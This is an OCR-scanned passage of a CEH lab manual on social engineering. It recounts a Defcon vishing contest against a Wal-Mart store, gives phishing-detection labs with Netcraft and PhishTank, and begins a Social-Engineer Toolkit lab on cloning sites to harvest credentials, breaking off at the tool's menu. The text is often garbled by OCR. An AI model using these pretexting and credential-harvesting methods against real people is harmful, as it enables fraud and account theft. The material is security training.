You are on page 1of 28

CEH Lab Manual

Social Engineering
Module 09

Module 09 - Social Engineering

Social Engineering
Social engineering is the art of convincingpeople to reveal confidential infonmtion.
I CON KEY
/ Valuable information ^ Test your

Lab Scenario
Source: http:/ / m onev.cnn.com /2012 /0 8 /O‫־־‬/technology/walm art-hackde Icon/index.litni Social engineering is essentially the art o f gaining access to buildings, systems, data by exploiting human psychology, rather than by breaking 111 01‫ ־‬using technical hacking techniques. The term “social engineering” can also mean an attem pt to gain access to information, primarily through misrepresentation, and often relies 011 the trusting nature o f m ost individuals. For example, instead o f trying to find software vulnerability, a social engineer might call an employee and pose as an IT support person, trying to tiick the employee into divulging 111s password.
01‫־‬

*5 Web exercise £ Q Workbook revie

Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employee into giving 111111 inform ation that could be used 111 a hacker attack to win a coveted “black badge” 111 the “social engineering” contest at the D eleon hackers’ conference 111 Las Vegas. 111 tins year's Capture the Flag social engineering contest at D eleon, champion Shane MacDougall used lying, a lucrative (albeit bogus) government contract, and 111s talent for self-effacing small talk to squeeze the following inform ation out o f Wal-Mart: ■ ■ The small-town Canadian Wal-Mart store's janitorial contractor Its cafeteria food-seivices provider

■ Its employee pay cycle ■ Its staff sliilt schedule ■ The time managers take then‫ ־‬breaks

■ W here they usually go for lunch ■ Type o f PC used by the manager ■ Make and version numbers o f the computer's operating system, and ■ Its web browser and antivirus software
111

Stacy Cowley at CNNM oney wrote up the details o f how Wal-Mart got taken to the extent o f coughing up so m uch scam-worthy treasure.

Calling from 111s sound-proofed booth at D eleon MacDougall placed an “urgent” call, broadcast to the entire D eleon audience, to a Wal-Mart store manager 111 Canada, introducing liiinsell as "G an‫ ־‬Darnell" from Wal-Mart's hom e oflice 111 Bentonville, Ark.

C E H L ab M an u al Page 675

E th ical H a ck in g a nd C o untenneasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

The role-playing visher (visliing being phone-based phishing) told the manager that Wal-Mart was looking at the possibility o f winning a multimillion-dollar government contract. “Darnell'’ said that 111s job was to visit a few Wal-Mart stores that had been chosen as potential pilot locations. But first, he told the store manager, he needed a thorough picture o f how the store operated. 111 the conversation, which lasted about 10 minutes, “Darnell” described himself as a newly lured manager o f government logistics. He also spoke offhand about the contract: “All I know is Wal-Mart can make a ton o f cash o ff it,” he said, then went on to talk about his upcom ing visit, keeping up a “ steady patter” about the project and life 111 Bentonville, Crowley writes. As if tins wasn't bad enough, M acDougall/Darnell directed the manager to an external site to fill out a survey 111 preparation for 111s upcom ing visit. The compliant manager obliged, plugging the address into 111s browser. W hen his com puter blocked the connection, MacDougall didn't miss a beat, telling the manager that he'd call the IT departm ent and get the site unlocked. After ending the call, stepping out o f the booth and accepting 111s well-earned applause, MacDougall became the first Capture the Flag champion to capture even‫ ״‬data point, or flag, on the competition checklist 111 the three years it has been held at Defcon. D efcon gives contestants two weeks to research their targets. Touchy inform ation such as social security numbers and credit card num bers are verboten, given that D efcon has no great desire to bring the law down on its head. D efcon also keeps its nose clean by abstaining from recording the calls, which is against Nevada law. However, there's no law against broadcasting calls live to an audience, which makes it legal for the D efcon audience to have listened as ]MacDougall pulled down Wal-Mart's pants. MacDougall said, “Companies are way more aware about their security. They’ve got firewalls, intrusion detection, log-in systems going into place, so it’s a lot harder for a hacker to break 111 these days, or to at least break in undetected. So a bunch o f hackers now are going to the weakest link, and the link that companies just aren’t protecting, which is the people.”\ MacDougall also shared few best practices to be followed to avoid falling victim to a social engineer: ■ ■ Never be afraid to say no. If something feels wrong, something is wrong A 11 IT departm ent should never be calling asking about operating systems, machines, passwords or email systems— they already know

C E H L ab M an u al Page 676

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

■ ■

Set up an internal company security word o f the day and don’t give any information to anyone who doesn’t know it Keep tabs 011 w hat’s 011 the web. Companies inadvertently release tons o f inform ation online, including through employees’ social media sites

As an expert eth ical hacker and penetration tester, you should circulate the best practices to be followed among the employees.
& T o o ls dem onstrated in this lab are available in D:\CEHTools\CEHv8 Module 09 Social Engineering

Lab Objectives
The objective o f this lab is to: ■ ■ D etect phishing sites Protect the network from phishing attacks

To earn* out tins lab, you need: ■ ■ A computer mmnng Window Seiver 2012 A web browser with Internet access

Lab Duration
Time: 20 Minutes » TASK 1
Overview

Overview Social Engineering
Social engineering is die art of convincing people to reveal confidential information. Social engineers depend 011 the fact that people are aware of certain valuable information and are careless 111 protecting it.

Lab Tasks
Recommended labs to assist you 111 social engineering: ■ ■ ■ Social engineering Detecting plushing using Netcraft Detecting phishing using PliishTank

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion your target’s security posture and exposure.
011

P L E A S E TALK T O Y OU R I N S T R U C T O R IF YOU HAV E Q U E S T I O N S R E L A T E D T O T H I S L AB .

C E H L ab M an u al Page 677

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

Delecting Phishing Using Netcraft
Netrmftprovides n‫׳‬eb server and n‫׳‬eb hosting warket-share analysis, including n'eb server and operating system detection.
I CON KEY
Valuable / information .‫*־‬ ‫״‬v Test your

Lab Scenario
By now you are familiar with how social engineering is perform ed and what sort ot inform ation can be gathered by a social engineer. Phishing is an example o f a social engineering technique used to deceive users, and it exploits the poor usability o f current web security technologies. Phishing is the act o f attempting to acquire information such as user names, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications claiming to be from popular social websites, auction sites, online payment processors, 01‫ ־‬IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by email spoofing 01‫־‬ instant messaging and it often directs users to enter details at a fake website whose look and feel is almost identical to the legitimate one. Phishers are targeting the customers o f banks and online payment services. They send messages to the bank customers by manipulating URLs and website forger\T . The messages sent claim to be from a bank and they look legitimate; users, not realizing that it is a fake website, provide their personal information and bank details. N o t all phishing attacks require a fake website; messages that claim to be from a bank tell users to dial a phone num ber regarding problems with their bank accounts. Once the phone num ber (owned by the plusher, and provided by a Voice over IP service) is dialed, it prom pts users to enter their account numbers and PIN. Vishing (voice phishing) sometimes uses fake callerID data to give the appearance that calls come from a trusted organization. Since you are an expert eth ical hacker and penetration tester, you m ust be aware o f phishing attacks occurring 011 the network and implement antiphishing measures. 111 an organization, proper training must be provided to people to deal with phishing attacks. 111 this lab you will be learning to detect phishing using Netcraft.

*a Web exercise ffi! Workbook revi!

C E H L ab M an u al Page 678

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

Lab Objectives
T in s k b w ill sh o w y o u p h ish in g sites u sin g a w e b b ro w s e r a n d sh o w y o u h o w to use th e m . I t w ill te a c h y o u h o w to: ■ ■
^ ~ T o o ls

D e te c t p h ish in g sites P ro te c t th e n e tw o rk fro m p h ish in g attack

T o carry o u t tins lab y o u need:

dem onstrated in this lab are available in D:\CEHTools\CEHv8 Module 09 Social Engineering


N etcraft is lo c a te d at D:\CEH-Tools\CEHv8 Module 09 Social Engineering\Anti-Phishing Toolbar\Netcraft Toolbar
Y o u can also d o w n lo a d th e la test v e rsio n o f Netcraft Toolbar fro m th e link h t t p : / /to o lb a r .n e tc r a lt.c o m / I f y o u d ecid e to d o w n lo a d th e la te st version, th e n sc re e n sh o ts sh o w n
111 th e lab m ig h t d iffer

■ ■ ■

A c o m p u te r ru n n in g W in d o w s S erv er 2012 A w e b b ro w se r (F irefox, I n te r n e t ex p lo rer, etc.) w ith In te rn e t access A d m in istra tiv e privileges to r u n th e N e tc r a lt to o lb a r

Lab Duration
Tim e: 10 M inutes

Overview of N etcraft Toolbar
N etc raft T o o lb a r provides Internet security services, including anti-fraud an d anti-phishing services, application testing, code reviews, au to m ated p en etratio n testing, and research data and analysis o n m an y aspects o f the Internet.

Lab Tasks
^ T A S K 1

1.

Anti-Phishing Tool bar

T o sta rt th is lab, y o u n e e d to la u n c h a w eb b ro w s e r first. 111 this lab w e hav e u se d Mozilla Firefox. L a u n c h th e Start m e n u by h o v e rin g th e m o u se c u rso r o n th e lo w er-left c o rn e r o f th e d esk to p .

2.

C E H L ab M an u al Page 679

E th ical H a ck in g a nd C ountem ieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

JL
‫״‬

5

Q = J Y o u cau also download the Netcraft toolbar form h ttp ://toolbar.netcraft.com

* | Windows Server 2012
W iw fciw o“ erfci2012 IUIc.m C1n4llMI( Dot*c«nV tiftlaatoncopv Bm OM W

FIGU RE 1.1: Windows Server 2012-Start Menu

3.

Click th e Mozilla Firefox ap p to la u n c h th e b ro w ser.

FIGU RE 1.2: Windows Server 2012-Start Menu Apps view

4.

T o d o w n lo a d th e Netcraft Toolbar fo r Mozilla Firefox, e n te r h t t p : / / to o lb a r.n e tc ra ft.c o m in th e ad d re ss b a r o f th e b ro w s e r o r d rag a n d d ro p th e netcraft_toolbar-1.7-fx.xpi file in F irefo x . 111 tins lab, w e are d o w n lo a d in g th e to o lb a r Iro m th e In te rn e t. 111 F ire fo x b ro w ser, click Download th e N etcraft Toolbar to install as th e ad d -o n .
^ etc M i ft ‫ןזח‬
SINGLEH 3 P ■ ‫ן‬n , ,

5. 6.
N etcraft provides Internet security services, including anti-fraud and anti-phishing services.

‫ת‬

M»tc‫׳‬-»ft Toolbar

‫• ■׳‬

Why u tt tn• Noicratt Toolbar? U Protect your tavinQf Irom I'hMhtnq attack*, a s«« the hoittnq totat)or1and U kfc Matatq 0 1« ‫י‬ O I1*lp defend 1 1 * 0 Internet community trooi tra

FIGURE 1.3: Netcraft toolbar downloading Page

C E H L ab M anual Page 680

E th ical H a ck in g a nd C o untenneasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

7.

O n th e Install pag e o f th e N e tc ra ft T o o lb a r site, click th e Firefox im age to c o n tin u e w ith in stallatio n .
fc 4 c P ftO l

nETCI^AFT

1

‫ ־ » ״‬,.(■.

D o w n lo a d N ow Netcraft Anti Phithing Toolbar

CQ Q 1 Netcraft is an Internet services company based in Bath, England.

&
System Raqiilramania

FIGU RE 1.4: N etcraft toolbar Installation Page

8.

Click Allow to d o w n lo a d N e tc ra ft T o o lb a r.
^ ‫ז‬ * » ‫סי‬ « at ■ 1 0 c * « .n e < r < ft< 0 » )lo * n 1 -‫־‬Hctcraft Teotbir

SNGLEH2r

■ 1

D o w n lo a d N ow N*te«H Antl-PN«hl0< ‫ ׳‬Todhtr

r=rs

a

Systam Kaquirtrranti > r> a*p l« tfc# rre (AMnn/HMnji) «

'oolba• <uppor‫׳‬

cwitnnrva>« .*‫׳‬sicns orthe too&ar 1 «r

or«e

roujrg ««> « tu w « oo«‫׳‬a. and Mian

Help & Support roM om • in at« llin Q ?fm • ••id at#1..I.II.1.‫״־‬ « mU . « also ha»» a 8 »t«t1 «n 0 »tutofwis <youWirt to g«t t*e m«t oa tf » • 1 wanrt toofcae

FIGU RE 1.5: Netcraft toolbar Installation-Allow button

9.

W h e n th e Softw are Installation d ialo g b o x ap p ears, click Install Now.
Software Installation Install add-ons only from authors whom you trust.
Malicious software can damage your computer or violate your privacy.

You have asked to install the following item: Netcraft Anti-Phishing Toolbar (Netcraft Ltd)

£ Q Netcraft Toolbar provides a wealth o f information about the sites you visit.

http://releases.mozilla.org/pub/mozilla.org/addons/1326/netcraft_toolbar-1.5-fx.xpi

Install N o w

Cancel

FIGU RE 1.6: Installing Netcraft Toolbar

10. T o c o m p le te th e in stallatio n it w ill ask y o u to re sta rt th e b ro w ser. C lick

Restart Now.

C E H L ab M anual P ag e 681

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

l .__ Risk Rating displays die trustworthiness o f die current

■ A• <o not afrcnttf K Help & Support • l*1gUHnIm ln ilM iuf 1‫׳‬ lr«m *■■•I U J4InilaMu• *Mr ‫ י‬Ao jlec h1v« jMlaclKMx/ iito ijit tf you • i t «0 with* non <ut019‫ •י‬M M toabJt • o«t 1Oimmh'it > n< vM «n1w4r«dn air M tU hM O ir (juMOtm

FIGU RE 1.7: Restarting Firefox browser

11. N etcraft Toolbar is n o w visible. O n c e th e Toolbar is in stalled , it lo o k s
sim ilar to th e fo llo w in g figure.
p

*

‫ם‬-

---\U

> « rw •t

fo n t

H ill•

1

J

FIGU RE 1.8: Netcraft Toolbar on Mozilla Firefox web browser

12. W h e n y o u visit a site, th e fo llo w in g in fo rm a tio n displays 111 th e T o o lb a r (unless th e pag e h as b e e n b lo ck ed ): Risk rating, Rank, a n d Flag. 13. Click S ite Report to sh o w th e r e p o rt o f th e site.

0=5!Site report links to : detailed report for die

FIGU RE 1.9: Report generated by N etcraft Toolbar

14. I f y o u a tte m p t to visit a p ag e th a t h as b e e n id e n tified as a p liish in g page by N e tc ra ft T o o lb a r y o u w ill see a warning dialog th a t lo o k s sim ilar to th e o n e in th e fo llo w in g figure. 15. T ype, as an exam ple: h ttp : / / w w w .pavpal.ca.6551 .secu re7 c.m x / im ages / cgi.bin

C E H L ab M anual Page 682

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

£ 0 . Phishing a site feeds 0011011x1011517updated encrypted database of patterns diat match phishing URLs reported by the Netcraft Toolbar.

FIGU RE 1.10: Warning dialog for blocked site

16. I f y o u tru st th a t p ag e click Y es to o p e n it a n d i f y o u d o n ’t, click No (R ecom m ended) to b lo c k th a t page. 17. I f y o u click No th e fo llo w in g p ag e w ill be displayed.
c Coofb

fi ft

C-

.!■!•!!‫■!ר‬

PhKMng S*o Hlockcxl

%lll t‫־‬ ‫־‬ »

.......- : m ;

.

L

FIGURE 1.11: Web page blocked by Netcraft Toolbar

Lab Analysis
D o c u m e n t all die results an d rep o rt g athered d uring die lab. T o o l/U tility N e tc r a f t I n f o r m a tio n C o l l e c t e d / O b j e c t i v e s A c h ie v e d ■ P h ish in g site d e te c te d

P LEASE TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T I O N S RE L A T E D TO T H I S LAB.

Questions
1. E v alu ate w h e th e r th e N e tc ra ft T o o lb a r w o rk s i f y o u use a tra n sp a re n t proxy.
E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

C E H L ab M anual Page 683

Module 09 - Social Engineering

2.

D e te rm in e it y o u can m ake th e N e tc ra ft T o o lb a r co e x ist o n th e sam e line as o th e r to o lb a rs. I f so, h o w ? H o w ca n y o u sto p th e T o o lb a r w a rn in g if a site is tru ste d ?

3.

I n t e r n e t C o n n e c t io n R e q u ir e d □ N< P la tf o r m S u p p o r te d 0 C la s s r o o m □ !Labs

C E H L ab M an u al Page 684

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

3
Detecting Phishing Using PhishTank
PhishTank is a collaborative clearinghousefor data and information regarding phishing on the Internet.
I C O N K E Y

Lab Scenario
P h ish in g is an a tte m p t b y an in d iv id u al 01‫ ־‬g ro u p to solicit p e rso n a l in fo rm a tio n fro m u n su sp e c tin g u sers by em p lo y in g social en g in eerin g te ch n iq u es. P h ish in g em ails are cra fte d to a p p e a r as if th ey h av e b ee n se n t fro m a legitim ate o rg an iz atio n 01‫ ־‬k n o w n individual. T h e se em ails o fte n a tte m p t to en tice u sers to click 011 a link th a t will take th e u se r to a fra u d u le n t w eb site th a t ap p ears legitim ate. H ie u se r th e n m ay b e ask ed to p ro v id e p e rso n a l in fo rm a tio n su c h as a c c o u n t u se r n am es a n d p a ssw o rd s th a t can fu rth e r ex p o se th e m to fu tu re co m p ro m ises. A dditio n ally , th e se fra u d u le n t w eb sites m ay c o n ta in m alicious code. W ith th e tre m e n d o u s in c re ase 111 th e u se o f o n lin e b an k in g , o n lin e share trad in g , a n d e c o m m e rc e, th e re h as b e e n a c o rre sp o n d in g g ro w th 111 th e in c id en ts o f p h ish in g b ein g u se d to carry o u t financial trau d s. P h isliin g in v o lv es fra u d u len tly acq u irin g sensitive in fo rm a tio n (e.g. p assw o rd s, cre d it c a rd details etc.) b y m a sq u erad in g as a m asted entity.
111 th e p rev io u s lab y o u h av e already seen h o w a p h ish in g site can b e d e te c te d u sin g th e N e tc ra ft tool.

Valuable ____information .‫־‬ >* Test your gfe Web exercise Workbook r‫׳‬e‫־‬ \

T h e u sual scen ario is th a t th e v ic tim receives an em ail th a t ap p e ars to h av e b ee n se n t fro m 111s bank. T h e em ail u rg es th e v ictim to click 011 th e lin k 111 th e em ail. W h e n th e v ic tim d o es so, h e is ta k en to “ a secu re p ag e 011 th e b a n k ’s w e b site .” T h e v ic tim believes th e w e b pag e to b e a u th en tic a n d h e e n te rs 111s u se r n am e, p a ssw o rd , a n d o th e r in fo rm a tio n . 111 reality, th e w e b site is a fake a n d th e v ic tim ’s in fo rm a tio n is sto len a n d m isused. B eing an ad m in istra to r 01‫ ־‬p e n e tra tio n tester, y o u m ig h t im p le m e n t all th e m o st so p h istica te d a n d ex p en siv e te c h n o lo g y so lu tio n s 111 th e w o rld ; all o l it can be byp assed i f y o u r em p lo y ees fall fo r sim ple social en g in ee rin g scam s. I t b ec o m e

C E H L ab M an u al Page 685

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

y o u r resp o n sib ility to e d u c ate em p lo y ees 011 b e st p ractices fo r p ro te c tin g in fo rm a tio n . P h ish in g sites 01‫ ־‬em ails can b e re p o rte d to p lu sl 11n g -re p o rt@ u s-c e rt.g o v h ttp : / / w w w .u s-c e rt.g o v / 11a v /r e p o r t p h 1sh 111g .h tm l U S -C E R T (U n ited S tates C o m p u te r E m e rg e n c y R ead in ess T eam ) is co llectin g p h ish in g em ail m essages a n d w eb site lo c atio n s so th a t th e y can h elp p eo p le av o id b e c o m in g v ic tim s o f p h ish in g scam s.

[CTTools dem onstrated in this lab are available in D:\CEHTools\CEHv8 Module 09 Social Engineering

Lab Objectives
T h is lab w ill sh o w y o u h o w to use p h ish in g sites u sin g a w e b b ro w ser. I t w ill teach y o u h o w to: ■ ■ D e te c t p h ish in g sites P ro te c t th e n e tw o rk fro m p h ish in g attacks

Lab Environment
T o carry o u t th e lab y o u need: ■ A c o m p u te r ru n n in g W in d o w s S erver 2012 ■ A w eb b ro w se r (F irefox, In te rn e t E x p lo re r, etc.) w ith In te rn e t access

Lab Duration
T une: 10 M inutes

Overview of PhiskTank
£ Q PhishTank URL: h ttp .//www.phishtank.com

P h ish T an k is a free community site w h ere anyone can subm it, verify, track, s!1are phishing data. P h ish T an k is a collaborative clearing h o u se for data

and and

inform ation regarding phish in g 011 the Internet. A lso, P h ish T an k provides an open API to r developers an d researchers to integrate anti-phishing data into their applications at 110 charge.

Lab Tasks
m.
T A S K 1

1.

T o sta rt th is lab y o u n e e d to la u n ch a w eb b ro w se r first. 111 th is lab w e hav e u se d Mozilla Firefox. L a u n c h th e Start m e n u b y h o v e rin g th e m o u se c u rso r 011 th e lo w er-left c o rn e r o f d esk to p .

PhishTank
2.

C E H L ab M an u al Page 686

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

jw
$

23 Windows Server 2012
W ndowa icrrct 2012 IUIe.m C «>vl!uatr D*t*cn» b<alMlon copy H u!a M W ‫׳‬

- g • *fa

FIGU RE 2.1: Windows Server 2012-Start Menu

3.

Click th e Mozilla Firefox ap p to la u n c h th e b ro w ser.

£ 0 1 PlushTank provides an open API for developers and researchers to integrate antiphishing data into dieir applications at no charge.

FIGU RE 2.2: Windows Server 2012-Start Menu Apps view

4.

T y p e http://w w w.phishtank.com in th e ad d ress b a r o f th e w e b b ro w s e r a n d p ress Enter. Y o u w ill see th e follow/ing

5.

PhishTank ‫־‬.,‫״‬.‫י‬.,
J o in t i e fiy lita y a iittt p liia liiiK j
Sdbmrtstsopdfdohshes Track the Uatis of /a ir suhmfyaons Verfy <A\cr jsen' subm a a ton. Develop software with our free API.

Recert Subrissbrs 1S7:£S1 rtnJ « r» n rm jm agei/< atvj

^ * ® : / V r s t M . a x V s y l g l i i a r t cu s e m n c s . a e b f u . i c t s c m n s r a u r A x r o i m
m.cvn’PM /iM lct.K n i

FIGU RE 2.3: Welcome screen o f PhishTank

C E H L ab M anual Page 687

E th ical H a ck in g a nd C ountem ieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

6.
PliishTauk 1s operated by O pen D N S to improve the Internet through safer, faster, and smarter DNS.

T y p e th e w e b site URL to b e c h e ck e d fo r p h ish in g , fo r ex am p le, h ttp : / / s d a p ld 2 1 .h o s t2 1.c o m . C lick Is it a phish?.

7.

Join the fight against phishing
Submrt tu w c » d pheftea. ‫־‬Rack the ttatic of 1 /cur submissions Verfyongf jserV suonssons Develop software wtthourftee API. j ntp //Kijptav. itMtucem R#c*r» SubriKtors

■d i m )f e a t )l u> m i f tHim » u » p « > l e 0p i r n

*M hT inkprovttet »‫ ׳‬oh‫ ״‬An ta r

' w c p c f c e t M lr d r c c i n t‫׳‬ ‫״‬ ‫י‬ ‫י‬ T f l 3 4 C T d Y ..

FIGU RE 2.4: Checking for site

I f th e site is a phishing site , y o u see th e fo llo w in g w a rn in g d ialo g b ox.

PhishTank

Ok of it* NM.i«o*MTw*

Submission #1571567 is aimentty ONLINE

O pen D N S is interested in having die best available information about phishing websites.

02

S01 n or Hcgcto‫ ׳‬to vert, t !6 sutxnsstor.

No screenshot yet
We have net yet successfully taken a screeasltol •f the submitted website.

FIGURE 2.5: W arning dialog for phishing site

Lab Analysis
D o c u m e n t all die w ebsites an d verify w h eth e r diey are ph ish in g sites. T o o l/U tility P h is k T a n k I n f o r m a tio n C o l l e c t e d / O b j e c t i v e s A c h ie v e d ■ P h ish in g site d e te c te d

C E H L ab M anual Page 688

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

PLEASE TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T I O N S RE L A T E D TO T H I S LAB.

Questions
1. 2. 3. E v alu ate w h a t P liisliT an k w a n ts to h e a r a b o u t spam . D o e s P liisliT an k p r o te c t y o u fro m p h ish in g ? W h y is O p e n D N S b lo ck in g a p lu sh site th a t P liisliT an k d o e s n 't list o r has n o t v et v e n tie d ?

I n t e r n e t C o n n e c t io n R e q u ir e d 0 Y es P la tf o r m S u p p o r te d 0 C la s s r o o m □ !Labs □ No

C E H L ab M an u al Page 689

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

3
Social Engineering Penetration Testing using Social Engineering Toolkit (SET)
The Socia/-Engineer Toolkit (SE T) is an open-source ‫־‬ Python-driven tool aimed at penetration testing around social engineering

■ con

key

Lab Scenario
Social en g in eerin g is an ev e r-g ro w in g th re a t to o rg an iz atio n s all o v er th e w o rld . Social en g in ee rin g attack s are u se d to c o m p ro m ise c o m p a n ie s e v e n ‫ ־‬dav. E v e n th o u g h th e re are m a n y h ac k in g to o ls available w ith u n d e rg ro u n d h ack in g c o m m u n itie s, a social en g in eerin g to o lk it is a b o o n fo r attack ers as it is freely available to u se to p e rfo rm sp e ar-p liish in g attack s, w eb site attack s, etc. A tta ck e rs ca n d ra ft em ail m essag es a n d a tta c h m alicio u s files an d se n d th e m to a large n u m b e r o f p e o p le u sin g th e sp e a r-p h ish in g attac k m e th o d . A lso , th e m u lti-atta ck m e th o d allow s u tiliza tio n o f th e Java ap p let, M e tasp lo it b ro w ser, C red e n tia l H a r v e s te r / T a b n a b b in g , etc. all a t once. T h o u g h n u m e ro u s so rts o l attack s can b e p e rfo rm e d u sin g tin s to o lk it, tins is also a m u st-h a v e to o l fo r a p e n e tra tio n te ste r to ch e ck fo r v u lnerabilities. S E T is th e sta n d a rd fo r social-en g in eerin g p e n e tra tio n tests a n d is su p p o rte d heavily w ith in th e security co m m u n ity . A s an eth ical hacker, p e n e tra tio n tester, o r security adm inistrator, y o u sh o u ld b e extrem ely fam iliar w ith th e Social E n g n ie e rin g T o o lk it to p e rfo rm v ario u s tests fo r vulnerab ilities 011 th e n etw o rk .

£_ Valuable

information
s

Test your knowledge Web exercise

m

Workbook review

Lab Objectives
T h e o b jectiv e o f tins lab is to h elp stu d e n ts le arn to: ■ ■ C lo n e a w eb site O b ta in u se r n am es a n d p a ssw o rd s u sin g th e C red e n tia l H a rv e ste r m e th o d G e n e ra te re p o rts fo r c o n d u c te d p e n e tra tio n tests
E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]


C E H L ab M an u al Page 690

Module 09 - Social Engineering

& Tools dem onstrated in this lab are available in D:\CEHTools\CEHv8 Module 09 Social Engineering

Lab Environment
T o earn ’ o u t die k b , y ou need: ■ ■ ■ R u n this tool 111 BackTrack V irtual M aclune W eb b row ser w ith In te rn e t access A dm inistrative privileges to m n tools

Lab Duration
T une: 10 M inutes

Overview of Social Engineering Toolkit
Social-Enguieer T oolkit is an o p en -so u rce P y th o n -d riv en to o l aim ed at p en etratio n testing aro u n d Social-Engineering. T lie (SET) is specifically designed to p erfo rm advanced attacks against die h u m a n elem ent. T lie attacks built in to d ie toolkit are designed to be targeted and focused attacks against a p erso n o r organization used during a pen etratio n test.

Lab Tasks
1.
T A S K 1

L o g in to y o u r BackTrack v irtu a l m aclune. Select A pplications ‫ ^־־‬BackTrack ‫ ^־־‬Exploitation T ools ‫ ^־־‬Social

2.

Execute Social Engineering Toolkit

Engineering T ools ‫ ^־־‬S ocial Engineering Toolkit a n d click Set.
^ Applications[ Places System [>7] 3 Tue Sep 25. 7:10 PM

|Q ^ Information Gathering r■ vulnerability Assessment

J0

Exploitation Tools Privilege Escalation

.-f * Network Exploitanor Tools Web Exploitation Tools Database Exploitation Tools ^ Wireless Exploitation Tools social E’ jifM 9 | Physical

E f Maintaining Access ^ I Reverse Engineering RFID100IS

a
9

BEEF XSS Framework

O
Forensics KCporting Tools c P services
y Miscellaneous ►

Exploitation

9
11•

MoneyPots
Social Engineering Toolkit

‫י‬Open Source E x p lo ite d ,h set \ 3

<< back track

FIGU RE 3.1: Launching SET in BackTrack

C E H L ab M anual P ag e 691

E tliical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

3.

A Terminal w in d o w fo r S E T w ill ap p ear. T y p e y an d p ress Enter to agree to th e term s o f service.
File Edit View Terminal Help THIS SOFTWARE, EVEN IF ADVISED OF THE PO SSIBILITY OF SUCH DAMAGE.

f f i s E T has been presented at large-scale conferences including Blackhat, DerbyCon, D efcon, and ShmooCon.

The above lic e n s in g was taken from th e BSD lic e n s in g and ^is a p p lie d to S o c ia l-E n g in e e r T o o lk it as w e l l . ___ " * ^ 1 Note t h a t th e S o c ia l-E n g in e e r T o o lk it i s p ro v id e d as i s , and i s p en -so urce a p p lic a t io n . M r

3

r o y a lt y f r e e

0

F e e l f r e e to m o d ify , use, change, m arket, do w h atever § u want w ith i t a f lo n g a s you g iv e th e a p p ro p r ia te c r e d i t where c r e d i t i s due (which means g iv in g th e au th o rs th e c r e d i t th e y ife s e rv e f o r w r i t in g i t ) . A lso n ote t h a t by using t h is s o ftw a re , i f you e v e r see th e c r e a t o r o f SET in a b a r , you a re re q u ire d to g iv e him a hugand buy him a b e e r. Hug must l a s t a t le a s t 5 seconds. Author holds th e r ig ft t to refipse th e hug o r th e b e e r . ■ f | ‫ן‬ ^ \ \ T ^ ^ * c M - E t l^ e e r T A lk it W s r fT iig fliiJ p y e ly good pn<r f l o t 'B k i l . I f y o u \a re if l a op I ^ S a t h * t o o l f o f l rcaj f c j B u ^ p u r J ^ e t h a r ^ r c n W c r a t h O T f t f l b ^ th e l:o m p a n y *y m j a r e ^ r e r f O T ll™ a ^ e s s « e r r ^ J ‫׳‬ou a re v i o l a t in g th e term s o f s e r v i e and lic e n s e o f t h i s t o o l s e t . B^ , r t t i n q X yes (o n ly one t im e ) , you ag ree to th e term s o f s e r v ic e a n d T n a t y o u w i l l o n ly us e t h i s t o o l f o r la w f u l purposes o n ly .

1

4

1

\

£ Q t1 1e web jacking attack is performed by replacing the victim’s browser with another window that is made to look and appear to be a legitimate site.

FIGU RE 3.2: SET Service Agreement option

4.

Y o u w ill b e p re s e n te d w ill a list o f m e n u s to select th e task. T y p e 1 an d p ress Enter to select th e Social-Engineering A ttacks o p tio n .
File Edit View Terminal Help Homepage: h ttp s ://w w w .tru s te d s e c .c o m [

Welcome to th e S o c ia l-E n g in e e r T o o lk i t (S E T J j.Y o u r one stop shop f o r a l l o f your s o c ia l-e n g in e e r in g n e e d s .^ , J o in us on i r c .f r e e n o d e .n e t i n channel # s e « J o lk it

f f i s E T allows you to specially craft email messages and send them to a large (or small) number of people with attached file format malicious payloads.

The S o c ia l-E n g in e e r T o o lk it i s a p rodu ct o f Tru sted S ec. V is it: h ttp s ://w w w .tru s te d 5 e c .c o m

S e le c t from th e menu:

J 1) Social-Engineering Attacks I
